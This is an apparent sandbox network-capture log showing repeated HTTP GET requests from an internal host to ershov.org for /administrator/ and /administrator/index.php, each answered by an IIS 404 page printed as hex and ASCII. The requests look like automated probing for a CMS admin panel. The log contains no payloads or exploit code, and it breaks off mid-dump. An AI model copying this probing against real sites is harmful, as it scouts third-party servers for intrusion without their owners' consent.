                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                105192.168.2.65496281.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.399730921 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.075293064 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.075300932 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.088665009 CET280OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.322824001 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.322833061 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                106192.168.2.65495681.177.24.8480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.401237965 CET228OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.073287010 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.073293924 CET563INData Raw: 73 20 28 49 49 53 29 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 54 65 63 68 6e 69 63 61 6c 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 66 6f 72 20 73 75 70 70 6f 72 74 20 70 65 72 73 6f 6e 6e 65 6c 29 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c
                                                                                                                                                                                                                                                                                                                Data Ascii: s (IIS)</h2><hr><p>Technical Information (for support personnel)</p><ul><li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.088149071 CET280OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: ershov.org
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://ershov.org/administrator/
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:29.301543951 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Length: 1635
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/6.0
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:27 GMT
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 